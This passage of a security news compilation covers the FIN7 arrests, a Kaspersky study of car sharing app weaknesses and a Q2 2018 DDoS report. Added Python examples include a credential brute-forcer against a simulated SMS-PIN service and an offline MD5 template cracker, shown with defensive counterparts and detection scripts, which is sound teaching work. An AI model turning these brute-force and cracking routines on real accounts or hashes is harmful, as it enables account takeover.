"FIN7 hacked into thousands of computer systems and stole millions of customer credit and debit card numbers, which the group used or sold for profit," it said.

The Justice Department said members of the "prolific hacking group" also targeted computer networks in Britain, Australia, and France.

FBI special agent Jay Tabb told a press conference in Seattle, Washington, where the arrests were announced, that the hacking was not state-sponsored.

"No linkage at all to any state-sponsored activity," Tabb said. "This is just old-fashioned organized crime."

Fedorov, a "high-level hacker and manager," was arrested in Bielsko-Biala, Poland, in January and is being detained pending extradition to the United States, the Department of Justice said.

Hladyr, FIN7's systems administrator, was arrested in Dresden, Germany, in January, it said, and is being held in Seattle, Washington, pending a trial scheduled to open on October 22.

Kolpakov, described as a "supervisor of a group of hackers," was arrested in Lepe, Spain, in late June and is being detained there pending a US extradition request, the department said.

- Chipotle, Arby's targeted -

"Cyber criminals who believe that they can hide in faraway countries and operate from behind keyboards without getting caught are just plain wrong," said Annette Hayes, US Attorney for the Western District of Washington.

The charges against the three were contained in federal indictments unsealed on Wednesday.

They were charged with 26 counts of conspiracy, wire fraud, computer hacking, access device fraud, and aggravated identity theft.

The Justice Department said that FIN7, also known as the "Carbanak Group" and the "Navigator Group," breached computer networks of companies in 47 US states and Washington DC.

They allegedly stole "more than 15 million customer card records from over 6,500 individual point-of-sale terminals at more than 3,600 separate business locations."

Among the companies which have publicly disclosed hacks by FIN7 are Chipotle Mexican Grill, Chili's, Arby's, Red Robin and Jason's Deli, the Justice Department said.

Many of the businesses were targeted through phishing schemes involving email.

"FIN7 carefully crafted email messages that would appear legitimate to a business' employee, and accompanied emails with telephone calls intended to further legitimize the email," it said.

Once an attached file was opened, it would trigger malware to steal payment card data which was sold on online underground marketplaces.

A study of car sharing apps
2.8.2018 Kaspersky  Mobil

The growing popularity of car sharing services has led some experts to predict an end to private car ownership in big cities. The statistics appear to back up this claim: for example, in 2017 Moscow saw the car sharing fleet, the number of active users and the number of trips they made almost double. This is great news, but information security specialists have started raising some pertinent questions: how are the users of these services protected and what potential risks do they face in the event of unauthorized access to their accounts?

Why is car sharing of interest to criminals?
The simple answer would be because they want to drive a nice car at somebody else’s expense. However, doing so more than once is likely to be problematic – once the account’s owner finds out they have been charged for a car they never rented, they’ll most likely contact the service’s support line, the service provider will check the trip details, and may eventually end up reporting the matter to the police. It means anyone trying it a second time will be tracked and caught red-handed. This is obvious and makes this particular scenario the least likely reason for hijacking somebody’s account.

The selling of hijacked accounts appears to be a more viable reason. There is bound to be demand from those who don’t have a driving license or those who were refused registration by the car sharing service’s security team. Indeed, offers of this nature already exist on the market.

Criminals offer hijacked accounts from a wide range of car sharing services…

…and explain why you are better off using somebody else’s account

In addition, someone who knows the details of a user’s car sharing account can track all their trips and steal things that are left behind in the car. And, of course, a car that is fraudulently rented in somebody else’s name can always be driven to some remote place and cannibalized for spare parts.

Application security
So, we know there is potential interest among criminal elements; now let’s see if the developers of car sharing apps have reacted to it. Have they thought about user security and protected their software from unauthorized access? We tested 13 mobile apps and (spoiler alert!) the results were not very encouraging.

We started by checking the apps’ ability to prevent launches on Android devices with root privileges, and assessed how well the apps’ code is obfuscated. This was done for two reasons:

the vast majority of Android applications can be decompiled, their code modified (e.g. so that user credentials are sent to a C&C), then re-assembled, signed with a new certificate and uploaded again to an app store;
an attacker on a rooted device can infiltrate the process of the necessary application and gain access to authentication data.
Another important security element is the ability to choose a username and password when using a service. Many services use a person’s phone number as their username. This is quite easy for cybercriminals to obtain as users often forget to hide it on social media, while car sharing users can be identified on social media by their hashtags and photos.

An example of how a social media post can give you away

We then looked at how the apps work with certificates and if cybercriminals have any chance of launching successful MITM attacks. We also checked how easy it is to overlay an application’s interface with a fake authorization window.

Reverse engineering and superuser privileges
Of all the applications we analyzed, only one was capable of countering reverse engineering. It was protected with the help of DexGuard, a solution whose developers also promise that protected software will not launch on a device where the owner has gained root privileges or that has been modified (patched).

File names in the installation package indicate the use of DexGuard

However, while that application is well protected against reverse engineering, there’s nothing to stop it from launching on an Android device with superuser privileges. When tested that way, the app launches successfully and goes through the server authorization process. An attacker could obtain the data located in protected storage. However, in this particular app the data was encrypted quite reliably.

Example of user’s encrypted credentials

Password strength
Half the applications we tested do not allow the user to create their own credentials; instead they force the user to use their phone number and a PIN code sent in a text message. On the one hand, this means the user can’t set a weak password like ‘1234’; on the other hand, it presents an opportunity for an attacker to obtain the password (by intercepting it using the SS7 vulnerability, or by getting the phone’s SIM card reissued). We decided to use our own accounts to see how easy it is to find out the ‘password’.

If an attacker finds a person’s phone number on social media and tries to use it to log in to the app, the owner will receive an SMS with a validation code:

As we can see, the validation code is just four digits long, which means it takes at most 10,000 attempts to guess it – not such a large number. Ideally, such codes should be at least six characters long and mix upper and lower case letters with digits.

Another car sharing service sends stronger passwords to users; however, there is a drawback to that as well. Its codes are created following a single template: they always have numbers in first and last place and four lower-case Latin characters in the middle:

That means there are about 45.7 million (10 × 26^4 × 10) possible combinations to search through; if the digits could appear in any of the six positions, the number of combinations would rise to about 2.2 billion (36^6). Of course, 45,000,000 is also a large number, but the app doesn't impose any timeout or attempt limit between guesses, so there is nothing to prevent brute forcing.

Now, let’s return to the PIN codes of the first application. The app gives users a minute to enter the PIN; if that isn’t enough time, users have to request a new code. It turned out that the combination lifetime is a little over two minutes. We wrote a small brute force utility, reproduced part of the app/server communication protocol and started the brute force. We have to admit that we were unable to brute force the code, and there are two possible reasons for that. Firstly, our internet line may have been inadequate, or secondly, the car sharing operator set an appropriate two-minute timeout for the PIN code, so it couldn’t be brute forced within two minutes even with an excellent internet connection. We decided not to continue, confirming only that the service remained responsive and an attack could be continued after several attempts at sending 10,000 requests at a time.

While doing so, we deliberately started the brute force in a single thread from a single IP address, thereby giving the service a chance to detect and block the attack, contact the potential victim and, as a last resort, deactivate the account. But none of these things happened. We decided to leave it at that and moved on to testing the next application.
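The behaviour described above can be modelled end to end: a login endpoint that issues a four-digit code with a two-minute lifetime, and a client that walks the whole 10,000-value space against it. The following is an added example written for this page, not the Kaspersky brute force utility or any operator's server code; the phone number is a constructed sample, and the attempt cap of five and the lock-and-notify reaction are assumptions about what a reasonable service should do. With `rate_limited=False` the model behaves as the tested service did (every guess is accepted while the code is alive); with `rate_limited=True` the account is frozen after a handful of wrong guesses.

```python
import hmac
import secrets
import time

PIN_LEN = 4                # the 4-digit code the article observed
CODE_TTL_SECONDS = 120     # observed lifetime: "a little over two minutes"


class PinService:
    """Server side of SMS-code login.

    rate_limited=False reproduces what the article observed: any number of
    attempts is accepted while the code is alive. rate_limited=True adds the
    per-code attempt cap (an assumed value) that should have been there.
    """

    def __init__(self, rate_limited, max_attempts=5, now=time.time):
        self.rate_limited = rate_limited
        self.max_attempts = max_attempts
        self.now = now                  # injectable clock (tests use a fake one)
        self._codes = {}                # phone -> [code, issued_at, attempts]
        self.locked = set()             # accounts frozen after too many guesses

    def send_code(self, phone, code=None):
        """Issue a code for `phone`. A fixed `code` may be passed for demos."""
        if code is None:
            code = f"{secrets.randbelow(10 ** PIN_LEN):0{PIN_LEN}d}"
        self._codes[phone] = [code, self.now(), 0]
        return code                     # really delivered by SMS, not returned

    def verify(self, phone, guess):
        if phone in self.locked or phone not in self._codes:
            return False
        entry = self._codes[phone]
        code, issued, _ = entry
        if self.now() - issued > CODE_TTL_SECONDS:
            del self._codes[phone]      # expired: a new code must be requested
            return False
        entry[2] += 1
        if self.rate_limited and entry[2] > self.max_attempts:
            self.locked.add(phone)      # in practice: lock and notify the owner
            del self._codes[phone]
            return False
        return hmac.compare_digest(code, guess)


def brute_force(service, phone):
    """Attacker side: walk the whole 10**PIN_LEN space against one number.

    Returns (code, attempts_made) on success, (None, attempts_made) otherwise.
    """
    for n in range(10 ** PIN_LEN):
        guess = f"{n:0{PIN_LEN}d}"
        if service.verify(phone, guess):
            return guess, n + 1
    return None, 10 ** PIN_LEN


if __name__ == "__main__":
    phone = "+70000000000"              # constructed sample number
    open_service = PinService(rate_limited=False)
    open_service.send_code(phone, code="7342")
    print("no rate limit:", brute_force(open_service, phone))   # ('7342', 7343)
    capped = PinService(rate_limited=True, max_attempts=5)
    capped.send_code(phone, code="7342")
    print("attempt cap:", brute_force(capped, phone),
          "locked:", phone in capped.locked)                    # (None, 10000) True
```

The expiry check on its own does not stop the attack: 10,000 requests fit comfortably into two minutes from a decent connection, and a new code can be requested when the old one lapses. Only the per-code attempt counter changes the economics, which is why the article's observation that nothing happened after repeated 10,000-request bursts is the real finding.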

We tried all the above procedures on the second app, with the sole exception that we didn’t register a successful brute force of the password. We decided that if the server allows 1,000 combinations to be checked, it would probably also allow 45 million combinations to be checked, so it is just a matter of time.

The server continues to respond after 1,000 attempts to brute force the password

This is a long process with a predictable result. This application also stores the username and password locally in an encrypted format, but if the attacker knows their format, brute forcing will only take a couple of minutes – most of this time will be spent on generating the password/MD5 hash pair (the password is hashed with MD5 and written in a file on the device).
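The offline attack on the locally stored hash is worth spelling out, because it shows why the template matters more than the password length. The block below is an added example for this page, not Kaspersky's code or any app's storage routine: it enumerates the template the article describes (digit, four lowercase Latin letters, digit), searches it for the MD5 preimage of a constructed "stolen" hash, and then shows the hardened counterpart, a per-device salt plus PBKDF2-HMAC-SHA256 with an assumed work factor of 200,000 iterations. Both keyspace figures quoted in the article are computed rather than asserted.

```python
import hashlib
import hmac
import itertools
import os
import string

DIGITS = string.digits
LOWER = string.ascii_lowercase


def keyspace_templated():
    """digit + four lowercase Latin letters + digit, as the article describes."""
    return 10 * 26 ** 4 * 10            # 45,697,600


def keyspace_unrestricted():
    """Six positions, each any of the 36 characters: the 'two billion' figure."""
    return 36 ** 6                      # 2,176,782,336


def template_candidates():
    """Yield every password that fits the template, in a fixed order."""
    for d1 in DIGITS:
        for letters in itertools.product(LOWER, repeat=4):
            middle = "".join(letters)
            for d2 in DIGITS:
                yield f"{d1}{middle}{d2}"


def store_md5(password):
    """What the article says the app writes to the device: plain MD5."""
    return hashlib.md5(password.encode()).hexdigest()


def crack_md5(target_hex, limit=None):
    """Offline search of the template space for the MD5 preimage.

    Returns the password, or None if `limit` candidates were tried in vain.
    Each guess costs one MD5 call, so the full 45.7M space is minutes of work.
    """
    target = bytes.fromhex(target_hex)
    for tried, candidate in enumerate(template_candidates()):
        if limit is not None and tried >= limit:
            return None
        if hashlib.md5(candidate.encode()).digest() == target:
            return candidate
    return None


ITERATIONS = 200_000    # assumed work factor for the hardened variant


def store_hardened(password, salt=None):
    """Hardened counterpart: random per-device salt plus PBKDF2-HMAC-SHA256.

    Every guess now costs ITERATIONS hash calls instead of one, and the salt
    stops a single precomputed table from covering every device.
    """
    salt = os.urandom(16) if salt is None else salt
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, key


def check_hardened(password, salt, key):
    cand = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(cand, key)


if __name__ == "__main__":
    stolen = store_md5("0aaaz7")        # constructed stand-in for the on-device file
    print("recovered:", crack_md5(stolen))                       # 0aaaz7
    rate = 1_000_000                    # assumed MD5 guesses per second
    print("template space:", keyspace_templated(),
          "-> seconds at 1M/s:", keyspace_templated() / rate)    # ~46 s
    print("unrestricted space:", keyspace_unrestricted())
    salt, key = store_hardened("0aaaz7")
    print("hardened check:", check_hardened("0aaaz7", salt, key))  # True
```

Even the hardened form only buys time; the better design for a car sharing client is not to keep the password on the device at all, but a revocable session token that the server can invalidate the moment a login from an unknown device is reported.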

MITM attack
It’s worth noting that the applications use HTTPS to communicate with their back ends, so it may take quite a while to figure out the communication protocol. To make our ‘attack’ faster, we resorted to an MITM attack, aided by a flaw shared by every app we tested: none of them validates the server’s certificate. We were able to obtain a dump of the entire session.

Screenshot of a successful MITM attack. HTTPS traffic dump was obtained

Protection from overlaying
Of course, it’s much faster and more effective (from the attacker’s point of view) if an Android device can be infected, i.e., the authorization SMS can be intercepted, so the attacker can instantly log in on another device. If there’s a complex password, then the attacker can hijack the app’s launch by showing a fake window with entry fields for login details that covers the genuine app’s interface. None of the applications we analyzed could counter this sort of activity. If the operating system version is old enough, privileges can be escalated and, in some cases, the required data can be extracted.

The situation is very similar to what we found surrounding Connected Car applications. It appears that app developers don’t fully understand the current threats to mobile platforms – that goes for both the design stage and when creating the infrastructure. A good first step would be to expand the functionality for notifying users of suspicious activities – only one service currently sends notifications to users about attempts to log in to their account from a different device. The majority of the applications we analyzed are poorly designed from a security standpoint and need to be improved. Moreover, many of the programs are not just very similar to each other but are actually based on the same code.

Russian car sharing operators could learn a thing or two from their colleagues in other countries. For example, a major player in the market of short-term car rental only allows clients to access a car with a special card – this may make the service less convenient, but dramatically improves security.

Advice for users
Don’t make your phone number publicly available (the same goes for your email address).
Use a separate bank card for online payments, including car sharing (a virtual card also works) and don’t put more money on it than you need.
If your car sharing service sends you an SMS with a PIN code for your account, contact the security service and disconnect your bank card from that account.
Do not use rooted devices.
Use a security solution that will protect you from cybercriminals who steal SMSs. This will make life harder not only for free riders but also for those interested in intercepting SMSs from your bank.
Recommendations to car sharing services
Use commercially available packers and obfuscators to complicate reverse engineering. Pay special attention to integrity control, so the app can’t be modified.
Use mechanisms to detect operations on rooted devices.
Allow the user to create their own credentials; ensure all passwords are strong.
Notify users about successful logons from other devices.
Switch to PUSH notifications: it’s still rare for malware to monitor the Notification bar in Android.
Protect your application interface from being overlaid by another app.
Add a server certificate check.

DDoS attacks in Q2 2018
2.8.2018 Kaspersky Attack

News overview
Q2 2018 news includes: non-standard use of old vulnerabilities, new botnets, the cutthroat world of cryptocurrencies, a high-profile DDoS attack (or not) with a political subtext, the Slashdot effect, some half-baked attempts at activism, and a handful of arrests. But first things first.

Knowing what we know about the devastating consequences of DDoS attacks, we are not inclined to celebrate when our predictions come true. Alas, our forecast in the previous quarter’s report was confirmed: cybercriminals continue to seek out new non-standard amplification methods. Even before the panic over the recent wave of Memcached-based attacks had subsided, experts discovered an amplification method using another vulnerability—in the Universal Plug and Play protocol, known since 2001. It allows garbage traffic to be sent from several ports instead of just one, switching them randomly, which hinders the blocking process. Experts reported two attacks (April 11 and 26) in which this method was likely used; in the first instance, the DNS attack was amplified through UPnP, and in the second the same was applied to an NTP attack. In addition, the Kaspersky DDoS Protection team observed an attack that exploited a vulnerability in the CHARGEN protocol. A slightly weaker attack using the same protocol to amplify the flood (among other methods) targeted the provider ProtonMail, the reason for which was an unflattering comment made by the company’s executive director.

New botnets are causing more headaches for cybersecurity specialists. A noteworthy case is the creation of a botnet formed from 50,000 surveillance cameras in Japan. And a serious danger is posed by a new strain of the Hide-n-Seek malware, which was the first of all known bots to withstand, under certain circumstances, a reboot of the device on which it had set up shop. True, this botnet has not yet been used to carry out DDoS attacks, but experts do not rule out such functionality being added at a later stage, since the options for monetizing the botnet are not that many.

One of the most popular monetization methods remains attacking cryptocurrency sites and exchanges. What’s more, DDoS attacks are used not only to stop competitors from attracting investors, but also as a way of making a big score. The incident with the cryptocurrency Verge is a case in point: in late May, a hacker attacked Verge mining pools and made off with XVG 35 million ($1.7 million). In the space of two months, the currency was hacked twice, although the preceding attack was not a DDoS.

Not only that, June 5 saw cybercriminals bring down the Bitfinex cryptocurrency exchange, with the system crash followed by a wave of garbage traffic, pointing to a multistage attack that was likely intended to undermine confidence in the site. It was probably competitive rivalry that caused the renowned online poker site, Americas Cardroom, to suffer a DDoS attack that forced first the interruption and then the cancellation of a tournament. That said, it was rumored that the attack could have been a political protest against the in-game availability of Donald Trump and Kim Jong Un avatars.

As always, the most media hype in the past quarter was generated by politically motivated DDoS attacks. In mid-April, British and US law enforcement bodies warned that a significant number of devices had been seized by Russian (supposedly Kremlin-sponsored) hackers in the US, the EU, and Australia with a view to carrying out future attacks. Then just a few days later, in late April, it was a Russian target that got hit: the site of the largest Russian political party, United Russia, was down for two whole days, yet there was precious little public speculation about the masterminds behind the DDoS campaign.

An attack on the Danish railway company DSB, which struggled to serve passengers for several days as a result, was also alleged to be politically motivated. Some see it as a continuation of the attack on Swedish infrastructure last fall.

At the end of the quarter, attention was focused on the Mexican elections and an attack on an opposition party website hosting materials about the illegal activities of a rival. According to the victim, the attack began during a pre-election debate when the party’s candidate showed viewers a poster with the website address. However, it was immediately rumored that DDoS was not the culprit, but the Slashdot effect, which Reddit users also call “the hug of death.” This phenomenon has been around since the dawn of the Internet, when bandwidth was a major issue. But it’s still encountered to this day when a small resource suffers a major influx of legitimate web traffic on the back of media hype.

The Slashdot effect was also observed by the Kaspersky DDoS Protection team in early summer. After a press conference by the Russian president, a major news outlet covering the event experienced a powerful wave of tens of thousands of HTTP GET requests all sent simultaneously. The size of the supposed botnet suggested a new round of attacks involving IoT devices, but further analysis by KDP experts showed that all suspicious queries in the User Agent HTTP header contained the substring “XiaoMi MiuiBrowser”. In fact, owners of Xiaomi phones with the browser app installed received a push notification about the outcome of the conference, and it seems that many took an interest and followed the link, causing a glut of requests.
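The User-Agent triage described above, as an added example that is not part of the report: it parses a burst of combined-format access log lines, measures how many GET requests carry the "XiaoMi MiuiBrowser" marker and summarises paths and client families so an analyst can tell a push-notification flash crowd from an unexplained flood. The log lines, UA strings and threshold are constructed for the example.

```python
import re
from collections import Counter

# Combined access log format: ip ident user [timestamp] "request" status size "referrer" "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed UA strings; the marker substring is the one named in the report.
MIUI_UA = ("Mozilla/5.0 (Linux; Android 8.0; MI 6) AppleWebKit/537.36 (KHTML, like Gecko) "
           "Chrome/61.0 Mobile Safari/537.36 XiaoMi MiuiBrowser/10.0.1")
DESKTOP_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"


def _entry(ip, ua, path="/news/press-conference", ts="07/Jun/2018:13:05:01 +0300"):
    """Build one constructed log line in the format LOG_RE parses."""
    return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" 200 5123 "-" "{ua}"'


# Burst 1 (constructed): many clients, one article, one mobile browser family dominating.
FLASH_CROWD = [_entry(f"203.0.113.{i}", MIUI_UA) for i in range(1, 9)] + [
    _entry("198.51.100.7", DESKTOP_UA),
    _entry("198.51.100.8", DESKTOP_UA, path="/"),
]
# Burst 2 (constructed): same volume, but empty User-Agents and scattered paths,
# which is what a scripted flood tends to look like.
UNEXPLAINED = [_entry(f"192.0.2.{i}", "-", path=f"/search?q={i}") for i in range(1, 11)]


def parse_log(lines):
    """Return one dict per line that matches the combined log format; skip the rest."""
    return [m.groupdict() for m in map(LOG_RE.match, lines) if m]


def triage_burst(lines, marker="XiaoMi MiuiBrowser", threshold=0.8):
    """Summarise a request burst and say whether one client family explains it.

    The verdict is a triage hint, not proof: a real browser family dominating the
    User-Agent values points towards a legitimate flash crowd (here, a push
    notification audience) and argues against blanket blocking.
    """
    gets = [r for r in parse_log(lines) if r["method"] == "GET"]
    if not gets:
        return {"requests": 0, "marker_share": 0.0, "verdict": "nothing to triage"}
    marked = sum(1 for r in gets if marker in r["ua"])
    share = marked / len(gets)
    summary = {
        "requests": len(gets),
        "distinct_ips": len({r["ip"] for r in gets}),
        "marker_share": round(share, 3),
        "top_paths": Counter(r["path"] for r in gets).most_common(2),
        "top_uas": Counter(r["ua"] for r in gets).most_common(2),
    }
    if share >= threshold:
        summary["verdict"] = f"likely flash crowd: {marked}/{len(gets)} requests carry '{marker}'"
    else:
        summary["verdict"] = "no single client family explains the burst; treat as possible botnet"
    return summary


if __name__ == "__main__":
    for name, burst in (("flash crowd", FLASH_CROWD), ("unexplained", UNEXPLAINED)):
        print(name, triage_burst(burst))
```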

Meanwhile, law enforcement agencies have been making every effort to prevent organized attacks: in late April, Europol managed to shut down Webstresser.org, the world’s largest DDoS-for-hire service. When it was finally blocked, the portal had more than 136,000 users and had served as the source of more than 4 million DDoS attacks in recent years. After the fall of Webstresser, conflicting trends were reported: some companies observed a significant decline in DDoS activity in Europe (although they warned that the drop was going to be relatively short-lived); others, however, pointed to a rise in the number of attacks across all regions, which may have been the result of attackers seeking to compensate by creating new botnets and expanding old ones.

On top of that, several DDoS attack masterminds were caught and convicted. German hacker ZZboot was sentenced for attacking major German and British firms with ransom demands. However, he avoided jail time, receiving 22 months of probation. At the other end of the Eurasian continent, in Taipei, a hacker named Chung was arrested for allegedly attacking the Taiwan Bureau of Investigation, the Presidential Administration, Chunghwa Telecom, and the Central Bank. In the other direction, across the pond, a self-proclaimed hacktivist was arrested in the US for obstructing the work of police in Ohio.

Another, less significant, but more curious arrest took place in the US: an amateur hacker from Arizona was arrested, fined, and jailed after an online acquaintance posted a tweet with his name. Despite his rudimentary skills, the cybercriminal, calling himself the “Bitcoin Baron,” had terrorized US towns for several years, crashing the websites of official institutions and demanding ransoms; in one incident, his actions seriously hindered emergency response services. He too tried to position himself as a cyberactivist, but his bad behavior ruined any reputation he might have had, especially his alleged (only by himself, it should be said) attempt to bring down the site of a children’s hospital by flooding it with child pornography.

Quarter trends
In H1 2018, the average and maximum attack power fell significantly compared to H2 2017. This can be explained by the seasonal slowdown that is usually observed at the start of the year. However, a comparison of H1 indicators for 2017 and 2018 shows a measurable rise in attack power since last year.

Change in DDoS attack power, 2017-2018

One way to increase the attack power is third-party amplification. As mentioned in the news overview, hackers continue to look for ways to amplify DDoS attacks through new (or well-forgotten old) vulnerabilities in widely popular software, not without success, unfortunately. This time, the KDP team detected and repelled an attack with a capacity in the tens of Gbit/s that exploited a vulnerability in the CHARGEN protocol—an old and very simple protocol described in RFC 864 way back in 1983.

CHARGEN was intended for testing and measurement purposes, and can listen on both TCP and UDP. In UDP mode, the CHARGEN server responds to any request with a packet containing a random string of 0 to 512 ASCII characters. Attackers use this mechanism by sending requests to vulnerable CHARGEN servers with the source address spoofed to that of the victim, so the replies land on the victim. US-CERT estimates the amplification factor at 358.8x, but this figure is somewhat arbitrary, since the response lengths are random.

Despite the protocol’s age and limited scope, many open CHARGEN servers can be found on the Internet. They are mainly printers and copying devices in which the network service is enabled by default in the software.

The use of CHARGEN in UDP attacks, as reported by KDP and other providers (Radware, Nexusguard), may indicate that attacks using more convenient protocols (for example, DNS or NTP) are becoming less effective, since there exist well-developed methods to combat this kind of UDP flooding. But the simplicity of such attacks makes cybercriminals unwilling to abandon them; instead they hope that modern security systems will not be able to resist antiquated methods. And although the search for non-standard holes will doubtless continue, CHARGEN-type amplification attacks are unlikely to take the world by storm, since vulnerable servers lack a source of replenishment (how often are old copiers connected to the Internet?).
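A victim-side detection for the CHARGEN reflection described above, as an added example that is not part of the report: it groups inbound UDP flow records whose source port is 19 by destination and flags destinations that receive replies from many distinct reflectors at high volume. The flow records, thresholds and addresses are constructed for the example.

```python
from collections import defaultdict
from dataclasses import dataclass

CHARGEN_PORT = 19   # RFC 864 Character Generator service
UDP, TCP = 17, 6    # IP protocol numbers


@dataclass(frozen=True)
class Flow:
    """One unidirectional flow record, as a NetFlow/IPFIX exporter would summarise it."""
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: int
    packets: int
    bytes: int


def detect_chargen_reflection(flows, min_reflectors=5, min_bytes=100_000):
    """Return destinations that look like CHARGEN reflection victims.

    Replies from a CHARGEN reflector arrive with UDP source port 19; a genuine
    client would see them from one server, so many distinct reflectors pointed at
    one destination with a high byte count is the signature worth alerting on.
    """
    per_dst = defaultdict(lambda: {"reflectors": set(), "packets": 0, "bytes": 0})
    for f in flows:
        if f.proto != UDP or f.src_port != CHARGEN_PORT:
            continue  # TCP CHARGEN sessions and other UDP services are out of scope
        s = per_dst[f.dst_ip]
        s["reflectors"].add(f.src_ip)
        s["packets"] += f.packets
        s["bytes"] += f.bytes
    suspects = {}
    for dst, s in per_dst.items():
        if len(s["reflectors"]) >= min_reflectors and s["bytes"] >= min_bytes:
            suspects[dst] = {
                "reflectors": len(s["reflectors"]),
                "bytes": s["bytes"],
                # CHARGEN replies average ~256 bytes of payload plus 28 bytes of IP/UDP header
                "avg_packet_bytes": round(s["bytes"] / s["packets"], 1),
            }
    return suspects


def sample_flows():
    """Constructed flow records (not a real capture) for one victim and some noise."""
    flows = [Flow(f"192.0.2.{i}", CHARGEN_PORT, "198.51.100.5", 40000 + i, UDP, 1000, 284_000)
             for i in range(1, 9)]
    flows += [
        Flow("192.0.2.50", 53, "198.51.100.6", 51000, UDP, 2000, 600_000),       # DNS replies, ignored
        Flow("192.0.2.51", CHARGEN_PORT, "198.51.100.7", 52000, UDP, 3, 900),    # one stray reply, below threshold
        Flow("192.0.2.52", CHARGEN_PORT, "198.51.100.5", 40100, TCP, 10, 5_000),  # TCP session, ignored
    ]
    return flows


if __name__ == "__main__":
    for victim, details in detect_chargen_reflection(sample_flows()).items():
        print(victim, details)
```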

If cybercriminals are going retro in terms of methods, when it comes to targets they are breaking new ground. DDoS attacks against home users are simple, but not profitable, whereas attacks on corporations are profitable, but complex. Now DDoS planners have found a way to get the best of both worlds—in the shape of the online games industry and streamers. Let’s take as an example the growing popularity of e-sports tournaments, in which the victors walk away with tens—sometimes hundreds—of thousands of dollars. The largest events are usually held at special venues with specially set-up screens and stands for spectators, but the qualifying rounds to get there often involve playing from home. In this case, a well-planned DDoS attack against a team can easily knock it out of the tournament at an early stage. The tournament server might also be targeted, and the threat of disruption could persuade the competition organizers to pay the ransom. According to Kaspersky Lab client data, DDoS attacks on e-sports players and sites with the goal of denying access are becoming increasingly common.

Similarly, cybercriminals are trying to monetize the market of video game streaming channels. Streaming pros show live playthroughs of popular games, and viewers donate small sums to support them. Naturally, the larger the audience, the more money the streamer gets for each broadcast; top players can earn hundreds or thousands of dollars, which basically makes it their job. Competition in this segment is fierce and made worse by DDoS attacks with the capacity to interfere with livestreams, causing subscribers to look for alternatives.

Like e-sports players, home streamers have virtually no means of protection against DDoS attacks. They are essentially reliant on their Internet provider. The only solution at present could be to set up specialized platforms offering greater protection.

Kaspersky Lab has extensive experience of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor the actions of botnets using the Kaspersky DDoS Intelligence system.

The DDoS Intelligence system is part of the Kaspersky DDoS Protection solution, and intercepts and analyzes commands sent to bots from C&C servers. What’s more, the system is proactive, not reactive—there’s no need to wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q2 2018.

In the context of this report, an incident is counted as a single DDoS attack if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, the incident is counted as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.
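The counting rule above, implemented as an added example that is not part of the report: botnet activity periods for the same (botnet, target) pair are merged into one attack while the gap between them is under 24 hours, a gap of 24 hours or more starts a new attack, and different botnets against the same target are always separate attacks. The activity periods, botnet names and addresses are constructed for the example.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

SPLIT_GAP = timedelta(hours=24)  # a pause of this length or longer starts a new attack


@dataclass(frozen=True)
class Activity:
    """One observed period of a botnet sending commands against one target."""
    botnet: str
    target: str      # victim IP address
    start: datetime
    end: datetime


@dataclass
class Attack:
    botnet: str
    target: str
    start: datetime
    end: datetime

    @property
    def duration(self):
        return self.end - self.start


def merge_attacks(activities):
    """Collapse activity periods into attacks under the 24-hour rule."""
    attacks, latest = [], {}   # latest: (botnet, target) -> most recent Attack
    for a in sorted(activities, key=lambda x: (x.botnet, x.target, x.start)):
        key = (a.botnet, a.target)
        current = latest.get(key)
        # Overlapping periods give a negative gap, which also merges.
        if current is not None and a.start - current.end < SPLIT_GAP:
            current.end = max(current.end, a.end)
        else:
            current = Attack(a.botnet, a.target, a.start, a.end)
            attacks.append(current)
            latest[key] = current
    return attacks


def summarize(attacks):
    """Quarter-style figures: attack count, unique targets (by IP), longest attack in hours."""
    return {
        "attacks": len(attacks),
        "unique_targets": len({a.target for a in attacks}),
        "longest_hours": max((a.duration.total_seconds() / 3600 for a in attacks), default=0.0),
    }


def sample_activities():
    """Constructed activity periods (not DDoS Intelligence data)."""
    t0 = datetime(2018, 4, 11, 0, 0)

    def h(n):
        return t0 + timedelta(hours=n)

    return [
        Activity("botnet-A", "198.51.100.10", h(0), h(3)),
        Activity("botnet-A", "198.51.100.10", h(5), h(8)),     # 2h gap: same attack
        Activity("botnet-A", "198.51.100.10", h(40), h(42)),   # 32h gap: new attack
        Activity("botnet-B", "198.51.100.10", h(1), h(2)),     # other botnet: separate attack
        Activity("botnet-A", "198.51.100.20", h(0), h(6)),     # other target
        Activity("botnet-A", "198.51.100.20", h(30), h(31)),   # exactly 24h gap: new attack
    ]


if __name__ == "__main__":
    print(summarize(merge_attacks(sample_activities())))
```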

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky Lab. Note that botnets are just one of the tools for performing DDoS attacks, and that the data presented in this report do not cover every single DDoS attack that occurred during the period under review.

Quarter results
The stormiest period for DDoS attacks was the start of the quarter, particularly mid-April. By contrast, late May and early June were fairly quiet.
Top spot in terms of number of attacks was retained by China (59.03%), with Hong Kong (17.13%) in second. It also entered the Top 3 by number of unique targets with 12.88%, behind only China (52.36%) and the US (17.75%).
The attacks were quite evenly distributed across the days of the week. The most and least popular were Tuesday and Thursday, respectively, but the difference is slight.
The share of SYN attacks rose sharply to 80.2%; second place went to UDP attacks with 10.6%.
The share of attacks from Linux botnets increased significantly to 94.47% of all single-family attacks.
Geography of attacks
